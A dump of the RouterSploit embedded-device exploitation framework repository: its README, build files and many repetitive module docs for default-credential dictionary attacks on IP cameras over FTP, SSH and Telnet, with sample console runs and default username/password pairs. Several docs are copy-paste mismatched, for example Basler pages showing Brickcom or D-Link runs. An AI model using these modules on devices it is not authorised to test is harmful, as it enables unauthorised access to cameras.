routersploit COPY rsf.py rsf.py # Not actually needed since present in docker-compose already CMD ["python", "rsf.py"] ================================================ FILE: LICENSE ================================================ Copyright 2018, The RouterSploit Framework (RSF) by Threat9 All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of RouterSploit Framework nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. The above licensing was taken from the BSD licensing and is applied to RouterSploit Framework as well. Note that the RouterSploit Framework is provided as is, and is a royalty free open-source application. Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit. ================================================ FILE: MANIFEST.in ================================================ recursive-include routersploit/resources/ssh_keys *.json *.key recursive-include routersploit/resources/vendors *.dat recursive-include routersploit/resources/wordlists *.txt ================================================ FILE: Makefile ================================================ .PHONY: build run test lint lint-modules clean prune help DIRECTORY=. EXCLUDED=.git,rsf.py RSF_IMAGE=routersploit FLAKE8_IGNORED_RULES=E501,F405,F403,W504 build: docker build -t $(RSF_IMAGE) . run: docker run -it --rm $(RSF_IMAGE) lint: python3 -m flake8 --exclude=$(EXCLUDED) --ignore=$(FLAKE8_IGNORED_RULES) $(DIRECTORY) tests: clean python3 -m pytest -n16 tests/core/ tests/test_exploit_scenarios.py tests/test_module_info.py python3 -m pytest -n16 tests/exploits/ tests/creds/ tests/encoders/ tests/generic/ tests/payloads/ clean: find . -name '*.pyc' -delete find . -name '*.pyo' -delete find . -name '*~' -delete prune: docker images -q -f dangling=true | xargs docker rmi docker ps -q -f status=exited | xargs docker rm help: @echo " run" @echo " Run Routersploit in docker container" @echo " lint" @echo " Check style with flake8." @echo " test" @echo " Run test suite" @echo " clean" @echo " Remove python artifacts." @echo " prune" @echo " Remove dangling docker images and exited containers." ================================================ FILE: README.md ================================================ # RouterSploit - Exploitation Framework for Embedded Devices [![Python 3.6](https://img.shields.io/badge/Python-3.6-yellow.svg)](http://www.python.org/download/) [![Build Status](https://travis-ci.org/threat9/routersploit.svg?branch=master)](https://travis-ci.org/threat9/routersploit) # Community Join community on [Embedded Exploitation Discord](https://discord.gg/UCXARN2vBx). # Description The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. [![asciicast](https://asciinema.org/a/180370.png)](https://asciinema.org/a/180370) It consists of various modules that aid penetration testing operations: * exploits - modules that take advantage of identified vulnerabilities * creds - modules designed to test credentials against network services * scanners - modules that check if a target is vulnerable to any exploit * payloads - modules that are responsible for generating payloads for various architectures and injection points * generic - modules that perform generic attacks # Installation ## Requirements Required: * requests * paramiko * pysnmp * pycrypto Optional: * bluepy - Bluetooth low energy ## Installation on Kali Linux ``` apt-get install python3-pip git clone https://www.github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py ``` Bluetooth Low Energy support: ``` apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py ``` ## Installation on Ubuntu 20.04 ``` sudo apt-get install git python3-pip git clone https://github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py ``` Bluetooth Low Energy support: ``` sudo apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py ``` ## Installation on Ubuntu 18.04 & 17.10 ``` sudo add-apt-repository universe sudo apt-get install git python3-pip git clone https://www.github.com/threat9/routersploit cd routersploit python3 -m pip install setuptools python3 -m pip install -r requirements.txt python3 rsf.py ``` Bluetooth Low Energy support: ``` apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py ``` ## Installation on OSX ``` git clone https://www.github.com/threat9/routersploit cd routersploit sudo python3 -m pip install -r requirements.txt python3 rsf.py ``` ## Running on Docker ``` git clone https://www.github.com/threat9/routersploit cd routersploit docker compose up --build -d docker attach routersploit ``` ### To run again without rebuild ``` docker start routersploit docker attach routersploit ``` # Update Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day. ``` cd routersploit git pull ``` # Build your own To our surprise, people started to fork [routersploit](https://github.com/threat9/routersploit) not because they were interested in the security of embedded devices but simply because they want to leverage our interactive shell logic and build their tools using similar concept. All these years they must have said: _"There must be a better way!"_ and they were completely right, the better way is called [_Riposte_](https://github.com/fwkz/riposte). [_Riposte_](https://github.com/fwkz/riposte) allows you to easily wrap your application inside a tailored interactive shell. Common chores regarding building REPLs was factored out and being taken care of so you can focus on specific domain logic of your application. # License The RouterSploit Framework is under a BSD license. Please see [LICENSE](LICENSE) for more details. # Acknowledgments * [riposte](https://github.com/fwkz/riposte) ================================================ FILE: docker-compose.yaml ================================================ services: routersploit: build: context: . dockerfile: Dockerfile container_name: routersploit environment: - PYTHONUNBUFFERED=1 stdin_open: true tty: true command: ["python","rsf.py"] ================================================ FILE: docs/modules/creds/cameras/acti/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Acti Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/acti/ftp_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/acti/ftp_default_creds rsf (Acti Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Acti Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/acti/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Acti Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/acti/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/acti/ssh_default_creds rsf (Acti Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Acti Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/acti/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Acti Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/acti/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/acti/telnet_default_creds rsf (Acti Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Acti Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/american_dynamics/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against American Dynamics Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/american_dynamics/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/american_dynamics/ftp_default_creds rsf (American Dynamics Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (American Dynamics Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/american_dynamics/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against American Dynamics Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/american_dynamics/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/american_dynamics/ssh_default_creds rsf (American Dynamics Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (American Dynamics Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/american_dynamics/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against American Dynamics Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/american_dynamics/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/american_dynamics/telnet_default_creds rsf (American Dynamics Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (American Dynamics Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/arecont/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Arecont Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/arecont/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/arecont/ftp_default_creds rsf (Arecont Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Arecont Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/arecont/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Arecont Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/arecont/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/arecont/ssh_default_creds rsf (Arecont Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Arecont Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/arecont/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Arecont Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/arecont/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/arecont/telnet_default_creds rsf (Arecont Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Arecont Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/avigilon/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avigilon Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avigilon/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avigilon/ftp_default_creds rsf (Avigilon Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avigilon Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/avigilon/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avigilon Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avigilon/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avigilon/ssh_default_creds rsf (Avigilon Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avigilon Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/avigilon/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avigilon Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avigilon/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avigilon/telnet_default_creds rsf (Avigilon Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avigilon Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/avtech/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avtech Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avtech/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avtech/ftp_default_creds rsf (Avtech Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avtech Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/avtech/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avtech Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avtech/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avtech/ssh_default_creds rsf (Avtech Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avtech Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/avtech/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Avtech Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/avtech/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/avtech/telnet_default_creds rsf (Avtech Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avtech Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/axis/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Axis Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/axis/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/axis/ftp_default_creds rsf (Axis Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Axis Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/axis/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Axis Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/axis/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/axis/ssh_default_creds rsf (Axis Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Axis Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/axis/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Axis Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/axis/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/axis/telnet_default_creds rsf (Axis Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Axis Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/basler/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Basler Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/basler/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/basler/ftp_default_creds rsf (Basler Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Basler Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/basler/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Basler Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/basler/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/brickcom/ssh_default_creds rsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Brickcom Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/basler/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Basler Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/basler/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/dlink/telnet_default_creds rsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- 